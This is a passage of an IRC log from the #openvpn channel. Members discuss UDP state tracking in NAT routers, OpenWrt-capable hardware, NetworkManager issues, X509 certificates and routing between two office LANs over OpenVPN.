network engineer 01:32 < soulcito> oh come on 01:32 <@krzee> btw, openwrt would be able to handle the vpn stuff too 01:32 < soulcito> you could have a lot of users connection to same web port 01:32 < soulcito> and they are different connections 01:32 <@krzee> so you wouldnt even need it on the lan machine(s) 01:32 < soulcito> even its a single user 01:32 <+pekster> But you are a CLIENT, not the SERVER 01:32 < soulcito> i know 01:33 < soulcito> but the router need to identify connections and save them 01:33 < soulcito> for the return 01:33 <@krzee> the server may have different connections, 1 per client 01:33 < soulcito> in udp is harder 01:33 <@krzee> but the client will only ever have a single connection, period 01:33 <+pekster> No, it's easier because it's a stream connection, not a stateful based connection 01:33 <+pekster> UDP is a "simplier" protocol. Which you should know as a "network engineer" 01:33 <@krzee> right, and i suggest not attempting to keepstate on udp if that is an option 01:34 <+pekster> UDP is stateless. Modern routers track the "state" of it as a stream based on a time limit, commonly 2-3 minutes for an established stream 01:34 <@krzee> although it can be done, its a hack and ugly as hell often times 01:34 <+pekster> So, your router is using around 100 bytes or so to track the connection, and a negligable amount of CPU traffic to handle the NAT. If that "breaks" it, buy a non-shitty piece of equipment. That's not an OpenVPN problem 01:34 < soulcito> pekster: dont need to be a troll 01:34 <@krzee> ehh? 01:34 <@krzee> pekster is helping you 01:35 <+pekster> I'm providing all sorts of useful information if you'd like to read what I have to say 01:35 < soulcito> "Which you should know as a "network engineer"" 01:35 < soulcito> that was offensive 01:35 <@krzee> you should! 01:36 < soulcito> what? 01:36 <+pekster> If that was offensive that wasn't the intent. I'm refuting your claim that UDP is more taxing on modern stateful NAT firewalls in embedded routers, which is completely false. Take away from that what you want. 01:36 < soulcito> udp is simpler? 01:36 <@krzee> you're the one who declared your network engineer status 01:36 < soulcito> come on, for a router could be headache 01:36 <@krzee> we're attempting to teach you stuff that we feel you should already know based on that declaration 01:36 <@krzee> which is fine, but you're fighting accepting the information 01:36 <+pekster> Yes. UDP is MUCH easier to track since you don't need to worry about tracking syn-received, ack-sent, estblished tcp, fin, fin-wait, and fin-ack states 01:37 <+pekster> TCP is stateful, which means you not only need to track the connection state (in stateful firewalls,) but you ALSO need to track what condition the tracked connection is in. UDP is just a raw stream of data with no "start" or "end", and thus no wowrry about what condition the stream is in 01:37 <+pekster> !tcpip 01:37 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 01:37 <@krzee> soulcito, what you said is only if its attempting to do udp state tracking, which it should NOT be doing and you should disable if you somehow did enable it. 01:38 < soulcito> one example, dont you think it could be difficult for a router to identify if its just a unidirectional udp?... 01:38 <@krzee> no 01:38 <@krzee> its not 01:38 <@krzee> its a 2 way stream 01:38 <@krzee> and even if it were not, no 01:38 < soulcito> but it needs to wait for the return, time in save the connection in the memory 01:38 <+pekster> Well, DHT is sometimes "unidirectional" in which case the entry is dropped from a statefull firewall system within about 30-60 seconds 01:38 <@krzee> exactly what do you think its trying to identify dude? 01:39 <@krzee> the encryption is all payload, why would your layer4 device be worrying about the layer7 data? 01:39 < soulcito> it could have other checks to confirm but dont know if a udp is unidirectional without waiting for the return 01:39 <+pekster> statefull tracking isn't on a per-packet basis; it's on a per-connection basis, of which OpenVPN uses one. 01:40 < soulcito> pekster: ok 30-60 seconds its a LOT, multiple for every udp stream could be generated 01:40 <@krzee> what router are you using anyways? 01:40 < soulcito> krzee: dunno, im just trying to discard, if it is not related to the encryption 01:40 < soulcito> its a cisco cablemodem 01:40 <+pekster> soulcito: I run bittorrent through a router with 16M of RAM. My statefull firewall maintains around 1500 to 2000 known states at any given point in time, and this is a fiarly cheap, low-end router by todays standards 01:41 <@krzee> your cisco cablemodem doesnt do any dpi, therefor i just ruled it out for you 01:41 <@krzee> but go ahead and test all ya like ;] 01:42 <@krzee> if you dont learn by listening, maybe experience will help 01:42 < soulcito> -_- 01:42 <@krzee> in case the answer was lost under all the talk: 01:42 <@krzee> !noenc 01:42 <@vpnHelper> "noenc" is (#1) if you're going to disable encryption, you might as well build a GRE tunnel or (#2) but you would use cipher none 01:43 <@krzee> #2 01:43 < soulcito> yeah i know 01:43 < soulcito> then the network manager problem appeared 01:43 < soulcito> :) 01:43 <@krzee> !netman 01:43 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 01:43 <@krzee> !ubuntu 01:43 <@vpnHelper> "ubuntu" is dont use network manager! 01:43 <@krzee> netman *is* a problem :-p 01:44 <@krzee> drop your config in /etc/openvpn named .conf 01:44 < chrisb> it has been years since i've owned a non-consumer router(cisco)...what's a good one? 01:45 <@krzee> i expect you wont guess your config right, but i wont be able to help with that since you dont run your server 01:45 < soulcito> pekster: most of the "fairly cheap" routers dies after 3-4 days of doing 4-5 concurrents torrents 01:45 < soulcito> pekster: memory gets full of garbage 01:45 <+pekster> "memory gets full of garbage" ?? 01:46 <@krzee> wow, what complete crap 01:46 <@krzee> spend the $30 for an openwrt able router 01:46 <@krzee> lol 01:47 <+pekster> I'm running an Asus WL-520gu router, a fairly generic OpenWRT-supported system with 4M flash, 16M RAM, 5 100 Base-T ports, and I support about 2 dozen FOSS torrents and around 2k connections overnight during my higher upload seeding time 01:47 <+pekster> I think it cost me about $30 after rebate, and that was 2+ years ago 01:47 <@krzee> when did it last reboot pekster 01:47 <@krzee> :D 01:48 <+pekster> About a month ago, and that was because I made a mistake and locked myself out with a "quick" rulechange that had a typo in my fw rules :P 01:48 < soulcito> just lost a linksys trying to conver to dd-wrt :-) 01:48 <+pekster> I used a similar product at my last job (Asus WL-500gPv2) and saw them stay running for months. I think the longest uptime was 200+ days before that person was fired 01:48 <@krzee> bricking routers doesnt sound very network-engineerish, did you develop the rom in question or something? :D 01:49 <+pekster> OpenWRT is more friendly to those looking to tinker with the networking, IMO, especially if you don't care about the WebUI frontend 01:49 <+pekster> Plus their build system is better ;) 01:49 <@krzee> my ddwrt doesnt even have a web frontend 01:50 <@krzee> and their buildsystem is lazy too once you write shell script wrappers! :D 01:50 < soulcito> krzee: it was just a PoC :) 01:50 <+pekster> 4M of flash on my home router, I don't have *room* for LuCI :D 01:50 < Wintereise> I have a rtn16 01:50 <@krzee> pekster, exactly! 01:50 * Wintereise waits to be bashed 01:50 <@krzee> bashed? 01:50 <@krzee> a quick google reveals it looks nice 01:51 <@krzee> holey shittons of ram 01:51 <@krzee> and flash too 01:51 < Wintereise> It's great, yeah 01:51 * krzee steals Wintereise's router 01:51 < Wintereise> nou :< 01:52 * soulcito has a CRS-3/16 :P 01:52 < soulcito> lol 01:52 <@krzee> my fav router is my freebsd server tho 01:52 <@krzee> with 3 nics and 4 tunnel devices 01:52 <@krzee> pf to keep the packets going where they should ;] 01:52 < Wintereise> http://www.asus.com/websites/global/products/WAa6AQFncrceRBEo/super_speed.jpg 01:52 < Wintereise> That is what tempted me 01:53 <@krzee> and multiple FIBS for the multiple uplink routing 01:53 <+pekster> I'll spend more than $30 on a router when ISPs offer real connection speeds like fiber to the door 01:53 <@krzee> mmmm fiber 01:53 <+pekster> US has 2nd world Internet connectivity :( 01:53 <@krzee> im in 3rd world 01:53 <@krzee> ild kill for some 2nd world 01:54 < soulcito> where are you from? 01:54 <@krzee> que vivo en el caribe 01:54 < soulcito> donde 01:54 <@krzee> vi que tu hablas espanol tambien 01:54 < soulcito> si 01:54 < soulcito> (-: 01:55 <@krzee> visitaba lima, es hermosa 01:56 < soulcito> lo mejor es su comida 01:56 < soulcito> eres de dominicana, pr? 01:56 <@krzee> im from california 01:56 < soulcito> lol 01:56 <@krzee> headed back soon for a visit 01:57 < Wintereise> I want a rtn66u or something 01:57 < Wintereise> It looks so amazing 01:57 <@krzee> !krzee 01:57 <@vpnHelper> "krzee" is (#1) krzee says happy 4/20 or (#2) http://www.ircpimps.org/pics/krzee/blunt.jpg 01:57 <@krzee> ^ me 01:58 < soulcito> what is that ? O_o 01:58 <@krzee> a blunt 01:59 <+pekster> RT-N66U has really ugly binary driver blobs 02:00 < Wintereise> It can't run openwrt yet? 02:00 < Wintereise> lame 02:00 <+pekster> https://forum.openwrt.org/viewtopic.php?id=33812 02:00 <@vpnHelper> Title: OpenWRT support for the ASUS RT-N66U (Page 1) — General Discussion — OpenWrt (at forum.openwrt.org) 02:01 <@krzee> supported by tomatousb and dd-wrt but not openwrt 02:01 < Wintereise> talk about sad 02:01 <@krzee> meh same shit, i dont touch the web gui anyways 02:01 <+pekster> My Asus unit only supports wifi with a 2.4 kernel ;) (thankfully I didn't buy it for wifi, and I'm running a new-ish 2.6 kernel without wifi, becuase Broadcom sucks) 02:01 <@krzee> broadcrap 02:01 <@krzee> i feel the same way about realtek (realcrap) 02:02 <@krzee> for their ethernet cards tho, their wiki is fine 02:02 < Wintereise> Both are equally shit 02:02 <+pekster> Depends on the chipset; there are a small handful of RTL chipsets that are open-enough to remain supported for pretty much any kernel >=2.2 02:03 <+pekster> No clue why open hardware isn't more in-demand :( 02:03 < Wintereise> Linux RT-N66U 2.6.22.19 #1 Tue Nov 22 10:29:48 CST 2011 mips GNU/Linux 02:03 < Wintereise> yay for ancient 02:04 <+pekster> And that, is why I demand devices that don't require binary blobs to run :( 02:04 < Wintereise> system type : Broadcom BCM5300 chip rev 1 pkg 0 02:04 < Wintereise> not bad 02:04 <+pekster> "But, but the label said OpenSource and dd-WRT supported" 02:04 <+pekster> Right 02:05 <+pekster> Read: we created a build using some arbitrary dd-wrt version and build the vendor's propritary binary network blob for that kernel version specifically 02:05 <@krzee> haha 02:05 <+pekster> I'm not ripping on dd-wrt (even though I like OpenWRT more,) but the mfgr's choice to not really "support" the product they built 02:06 < Wintereise> ASUS Support has since 10 days not answered on my Bugreport I sent in via vip.asus.com 02:06 < Wintereise> lol 02:06 < Wintereise> VIP VIP VIPPAY 02:06 < Wintereise> I have a z77 board that classifies me as 'vip' too 02:07 < Wintereise> And same case there 02:07 < Wintereise> Ultra slow support 02:07 < Wintereise> They eventually do reply 02:09 < soulcito> oh i found the damn profiles :-) 02:10 < soulcito> /etc/NetworkManager/system-connections/ 02:20 < soulcito> silence~~ 02:22 -!- kyrix_ [~ashley@71-212-67-12.tukw.qwest.net] has quit [Quit: Ex-Chat] 02:22 -!- kyrix [~ashley@71-212-67-12.tukw.qwest.net] has joined #openvpn 02:43 -!- brute11k [~brute11k@89.249.235.187] has quit [Ping timeout: 255 seconds] 03:20 -!- brute11k [~brute11k@89.249.230.5] has joined #openvpn 03:42 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 03:48 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 03:54 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has quit [Ping timeout: 272 seconds] 03:56 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has joined #openvpn 04:17 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:17 -!- catsup [~d@64.111.123.163] has joined #openvpn 04:18 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 04:39 -!- soulcito [~soulse@190.222.252.9] has quit [Remote host closed the connection] 04:39 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:00 -!- ade_ [~Ade@koln-5d816bdb.pool.mediaways.net] has joined #openvpn 05:01 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 05:17 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 05:48 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 06:12 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 06:34 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 07:40 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 07:47 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 08:05 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 248 seconds] 08:06 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 08:17 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 08:17 -!- mode/#openvpn [+v s7r] by ChanServ 08:21 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has joined #openvpn 08:46 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:46 -!- ade_ [~Ade@koln-5d816bdb.pool.mediaways.net] has quit [Quit: Too sexy for his shirt] 08:48 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Remote host closed the connection] 08:50 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has quit [Ping timeout: 276 seconds] 08:50 -!- Porkepix [~Porkepix@lns-bzn-54-82-251-84-104.adsl.proxad.net] has joined #openvpn 08:51 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 248 seconds] 09:01 <+s7r> what kind of certs does openvpn use? X509 ? 09:04 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:10 -!- PhotoJim [~Jim@devonport.ip4.photojim.ca] has quit [Ping timeout: 255 seconds] 09:17 <+dvl> s7r: I think so. I can point here, I just wrote this. Does that help? http://dan.langille.org/2013/01/03/ssl-admin/ 09:17 -!- PhotoJim [~Jim@devonport.ip4.photojim.ca] has joined #openvpn 09:17 <+dvl> $ openssl x509 -text -in active/ca.crt 09:17 <+dvl> etc? so yeah, I think so. 09:21 <+s7r> yup 09:21 <+s7r> that is correct dvl 09:21 <+s7r> nice documentation you have written here 09:21 <+s7r> you use freebsd ? 09:21 <+dvl> Thank you. Yes. 09:22 <+dvl> I usually write at http://www.freebsddiary.org/ but have taken to WordPress. I'm converting the Diary over. 09:22 <@vpnHelper> Title: The FreeBSD Diary (at www.freebsddiary.org) 09:32 <+s7r> nice 09:32 <+s7r> to have u here 09:35 <+dvl> thanks 09:36 -!- fluter [~fluter@fedora/fluter] has quit [Read error: Operation timed out] 09:53 -!- m0sphere` [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 09:54 <+s7r> l 09:56 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Ping timeout: 265 seconds] 10:21 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 10:21 -!- master_of_master [~master_of@p57B55186.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 10:23 -!- master_of_master [~master_of@p57B536BC.dip.t-dialin.net] has joined #openvpn 10:25 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 10:53 -!- Porkepix [~Porkepix@lns-bzn-54-82-251-84-104.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 10:55 -!- Porkepix [~Porkepix@lns-bzn-54-82-251-84-104.adsl.proxad.net] has joined #openvpn 11:03 -!- gallatin [~gallatin@dslb-188-109-167-165.pools.arcor-ip.net] has joined #openvpn 11:15 -!- kyrix [~ashley@71-212-67-12.tukw.qwest.net] has quit [Ping timeout: 252 seconds] 11:17 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 11:19 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 11:45 -!- ade_b [~Ade@ip-109-41-93-148.web.vodafone.de] has joined #openvpn 11:45 -!- ade_b [~Ade@ip-109-41-93-148.web.vodafone.de] has quit [Changing host] 11:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:46 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:51 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 12:07 <+s7r> dvl: u there? 12:08 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has left #openvpn [] 12:26 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 12:26 < DBordello> !goal 12:26 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 12:37 < soulse> !sex 12:37 < soulse> lol 12:54 -!- gallatin [~gallatin@dslb-188-109-167-165.pools.arcor-ip.net] has quit [Quit: Client exiting] 13:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:01 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 13:02 -!- pie___ [~pie_@unaffiliated/pie-/x-0787662] has quit [Read error: Connection reset by peer] 13:02 -!- pie___ [~pie_@84-236-109-204.pool.digikabel.hu] has joined #openvpn 13:02 -!- pie___ [~pie_@84-236-109-204.pool.digikabel.hu] has quit [Changing host] 13:02 -!- pie___ [~pie_@unaffiliated/pie-/x-0787662] has joined #openvpn 13:06 -!- cmelbye [~charlie@yourwiki/staff/charlie] has quit [Ping timeout: 276 seconds] 13:06 -!- cmelbye [~charlie@yourwiki/staff/charlie] has joined #openvpn 13:12 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 13:19 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 13:44 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 13:45 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 13:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 13:47 -!- brute11k [~brute11k@89.249.230.5] has quit [Quit: Leaving.] 13:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:54 -!- Nanuq [~nanuq@tlalocan.teotlalli.ecks.ca] has quit [Read error: Operation timed out] 13:54 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 13:55 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Read error: Operation timed out] 13:57 -!- Nanuq [~nanuq@tlalocan.teotlalli.ecks.ca] has joined #openvpn 13:57 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 13:57 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 13:58 -!- mode/#openvpn [+o plaisthos] by ChanServ 13:59 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Ping timeout: 252 seconds] 14:05 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 14:06 -!- Nanuq [~nanuq@tlalocan.teotlalli.ecks.ca] has quit [Read error: Operation timed out] 14:09 -!- Nanuq [~nanuq@tlalocan.teotlalli.ecks.ca] has joined #openvpn 14:17 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving] 14:23 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 14:31 -!- emmanuel__ [~emmanuelu@178.33.182.87] has joined #openvpn 14:32 -!- emmanuel__ [~emmanuelu@178.33.182.87] has quit [Read error: Connection reset by peer] 14:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 255 seconds] 14:45 -!- Porkepix [~Porkepix@lns-bzn-54-82-251-84-104.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 15:03 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 15:48 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:48 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 16:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-137.28.wb.wifirst.net] has joined #openvpn 16:35 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 17:04 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 17:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:13 -!- m0sphere` [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Ping timeout: 246 seconds] 17:18 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 17:24 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:09 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-137.28.wb.wifirst.net] has quit [Ping timeout: 272 seconds] 18:55 -!- PhotoJim [~Jim@devonport.ip4.photojim.ca] has left #openvpn [] 19:18 -!- Devastator- [~devas@177.18.197.24] has joined #openvpn 19:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 19:30 -!- Nanuq [~nanuq@tlalocan.teotlalli.ecks.ca] has left #openvpn [] 19:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:57 -!- Devastator- [~devas@177.18.197.24] has quit [Changing host] 19:57 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 19:57 -!- Devastator- is now known as Devastator 20:21 -!- valparaiso_ [~valparais@ARennes-257-1-162-104.w2-10.abo.wanadoo.fr] has joined #openvpn 20:23 -!- valparaiso_ is now known as valparaiso 20:28 -!- valparaiso_ [~valparais@ARennes-257-1-162-104.w2-10.abo.wanadoo.fr] has joined #openvpn 20:29 -!- valparaiso [~valparais@ARennes-257-1-162-104.w2-10.abo.wanadoo.fr] has quit [Ping timeout: 240 seconds] 20:30 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn 20:33 -!- valparaiso_ [~valparais@ARennes-257-1-162-104.w2-10.abo.wanadoo.fr] has quit [Ping timeout: 264 seconds] 22:03 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:31 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 23:05 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 23:52 -!- [1]JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 23:53 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 23:54 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Ping timeout: 260 seconds] --- Day changed Mon Jan 07 2013 00:38 -!- soulse [~soulse@190.222.252.9] has quit [Remote host closed the connection] 00:49 -!- brute11k [~brute11k@89.249.235.75] has joined #openvpn 00:59 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 01:12 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 01:39 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 01:39 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Quit: Ex-Chat] 01:40 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 01:47 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 260 seconds] 01:58 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Quit: Leaving] 02:00 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:02 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 02:07 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 02:07 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 02:09 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Client Quit] 02:13 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 02:20 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 265 seconds] 02:25 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:25 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Read error: Connection reset by peer] 02:32 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 02:33 -!- ade_b [~Ade@109.58.116.227.bredband.tre.se] has joined #openvpn 02:33 -!- ade_b [~Ade@109.58.116.227.bredband.tre.se] has quit [Changing host] 02:33 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:47 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 02:54 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 252 seconds] 02:55 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 02:56 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 03:01 -!- IT [~userit@86.120.191.55] has joined #openvpn 03:03 < IT> hey guys 03:04 < IT> what do i need to change so i can use samba over two routed offices, in the current config? http://pastebin.com/TPHCCUdn 03:08 <+pekster> You are pushing the wrong subnet to the client, and you don't have a ccd directory with an iroute for the client's network 03:08 <+pekster> !serverlan 03:08 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 03:08 <+pekster> !clientlan 03:08 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 03:08 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 03:08 <+pekster> Pick one of those to work on at a time and follow the instructions 03:08 < IT> ty 03:09 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:10 < IT> !iroute 03:10 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefor belongs in a ccd entry. Also see !route and !ccd 03:21 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 03:29 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 272 seconds] 03:44 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Quit: Ex-Chat] 03:55 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 04:02 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 256 seconds] 04:07 < IT> i changed the config http://pastebin.com/NimZCLEC but i can't access the other subnet http://pastebin.com/NimZCLEC what did i missed? 04:16 -!- yeshello1here [~hi@80.168.239.88] has joined #openvpn 04:16 < yeshello1here> i have a weird issue, i've got a bridged server and a number of clients attached, when trying to communicate client to client i see arps hitting the bridge on the server, but they never appear to go back out of the tap device 04:16 < yeshello1here> i know i could enable client-to-client, but i wish to firewall these clients from each other to some extent 04:17 < yeshello1here> is this a limitation i'm unaware of or have i screwed something up? i can pastebin the configs if needed but they're little more than howto examples 04:20 < yeshello1here> for extra reference, the server can happily ping and get arp replies from all clients without issue, it's just client to client that seems to be broken and i can't easily see why 04:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 04:29 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 04:37 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 255 seconds] 04:52 -!- dazo_afk is now known as dazo 04:54 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 05:03 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 05:08 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:10 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 240 seconds] 05:20 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 05:38 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 05:45 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 252 seconds] 05:50 -!- ade_b [~Ade@109.58.116.227.bredband.tre.se] has joined #openvpn 05:50 -!- ade_b [~Ade@109.58.116.227.bredband.tre.se] has quit [Changing host] 05:50 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:58 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 06:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 06:11 -!- ex0a [~high@unaffiliated/ex0a] has left #openvpn ["Leaving"] 06:12 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 06:14 < IT> is anybody here willing to help me setup a office-2-office connection for a moderate fee? 06:20 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 276 seconds] 06:20 -!- [1]JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- Chicks dig it] 06:21 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 06:29 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:46 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 06:53 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 240 seconds] 07:20 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 07:28 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 248 seconds] 07:31 -!- fu_fu 